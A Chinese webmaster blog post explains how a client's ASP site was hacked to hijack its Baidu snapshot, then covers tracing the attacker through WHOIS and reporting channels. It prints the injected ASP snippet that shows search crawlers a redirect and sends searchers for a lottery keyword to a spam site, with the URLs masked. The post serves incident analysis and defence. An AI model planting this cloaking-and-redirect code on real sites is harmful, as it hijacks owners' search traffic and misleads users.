百度快照是如何被黑客篡改的

• 威海seo技术提升  威海网站被黑
• 1011

写本篇文章的目的在于揭露一种黑客作弊的手段，也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第1张

前几日，我的客户电话说自己的百度排名没有了，查询下竟然百度标签显示的内容是一家违禁词平台的网站内容。 我知道网站被黑客加入了非法代码，恶意篡改了百度快照。(截图如下)

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第2张

查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第3张

1、黑客是如何修改百度快照的呢?

我进行了排查，客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

路径：Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码：

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第4张

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"（跳转的网站，引导百度抓取的内容）

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';（目标网站）window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客设置的这串代码导致百度爬虫抓取网页的时候，直接抓取越过客户网站抓取了跳转网站内容，导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

2、那么黑客是如何进入后台的呢?

黑客要进入后台，必须知道FTP账户和密码，以及IP地址。

造成的原因有如下几种：

1)一方面是FTP密码设置的时候比较简单化，很容易被利用软件破解掉，

2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的，除非有人提供。

3、网站被黑之后，你如何追查黑客的来源?

方法比较简单，就是查询你跳转的目标网站的域名信息。一般情况下，都是一些小型的站长开发的赚钱网站，通过查询域名信息你可以获知该域名的归属人是谁，他有可能就是黑你网站的人。

如果是比较大型的网站利用外包的方式进行推广，那么你也可以得知负责人，给百度或者是网络警察举报一下，该网站存在恶意攻击修改内容的行为，毕竟它也有一定得责任。

通过中国万网Whois域名查询：比如我客户跳转的违禁词网站的域名信息如下：

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第5张

1)第一个是：注册人

2)第二个是：联系电话

3)第三个是：联系邮箱

基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话，建议你通过以下方式进行维权：

违法和不良信息举报中心：http://net.china.cn/

12321网络不良与垃圾信息举报受理中心：http://www.12321.cn/

国家互联网应急中心网络安全举报中心：http://www.cert.org.cn/

中国反钓鱼网站联盟认定及处理流程： http://www.cnnic.cn/

公安部信息网络安全报警网站：http://www.cyberpolice.cn/wfjb/

中国扫黄打非网：http://www.shdf.gov.cn/

北京市公安局网络违法犯罪举报网站：http://www.bj.cyberpolice.cn/index.jsp

希望本篇文章对你防黑有帮助。

感谢【网牛天下】的精彩分享

来源：卢松松博客

• Share
• Print
• More

  Report Save Info Ger More Info

  View More

这些搜索常见问题，你都知道答案吗？

• 威海seo技术提升  威海seo问答
• 431

“为什么我的资源没有被收录？”“网站被黑了怎么办？”“搜索中的索引量与流量有关系吗？”朋友们，你是否也存在着这些疑问呢？小鱼在本篇文章中对搜索常见的问题进行了详细解答，帮助各位开发者扫除疑惑，更高效地运营站点和智能小程序。图片一、PC/H5站点相关1新站点为什么迟迟不收录？资源的收录有一定的周期，如果是有价值的资源，将会在周期内被百度蜘蛛抓取并收录，如果资源未被收录，则需要开发者从站点资源是否优质

• Share
• Print
• More

  Report Save Info Ger More Info

  View More

如何降低域名被恶意泛解析的风险

• 威海seo技术提升  威海网站被泛解析
• 1164

域名被恶意泛解析是域名安全最常见的问题之一，服务商往往起到决定性作用，那么作为站点自身该做哪些工作呢？SEO从业者洪石陈管理着多个当地媒体站点，虽然他说自己是网站安全领域内的小学生，但还是很愿意分享一些网站安全工作的心得。百度站长平台特意向洪石陈约稿，请他来分享一下站点如何从自身出发降低被泛解析的风险，下面就是他的反馈内容，希望可以帮到各位站长，同时也欢迎更多网站安全专家在百度站长平台进行分享。一

• Share
• Print
• More

  Report Save Info Ger More Info

  View More

网站被黑，该如何解决呢？

• 威海seo技术提升  威海网站被黑
• 390

网站被黑是一件非常严重的事情，可能导致数据泄露、服务中断、损失等严重后果。以下是解决网站被黑的建议： 1. 立即停止网站服务：数据遭到破坏是非常严重的，网站管理员应该立即停止网站服务以避免进一步损坏。 2. 确认被入侵的渠道：尽快找出是哪个漏洞或者渠道导致被黑，防止再次被入侵。 3. 采取一系列紧急措施：更改所有密码，备份网站数据，恢复存在备份中的数据，更新所有已知漏洞，限制对网站的访问权限

• Share
• Print
• More

  Report Save Info Ger More Info

  View More

网站被黑应该怎么做 — 网站被黑操作指南

• 威海seo技术提升  威海网站被黑
• 670

网站被黑，通常表现为网站中出现大量非本网站发布的类似博彩内容，或网站页面直接跳转到博彩页面。以下是几种网站被黑后可能出现的页面：● 内容非网站发布，内容中含大量博彩网站指向：● 网站页面直接跳转到博彩网站：网站被黑表明网站安全存在严重问题或漏洞。如何防范网站被黑，请参考以下内容：一、首先，自查站点是否被黑1.被黑网站在数据上有一个特点，即索引量和从搜索引擎带来的流量在短时间内数据异常。所以，站长可

• Share
• Print
• More

  Report Save Info Ger More Info

  View More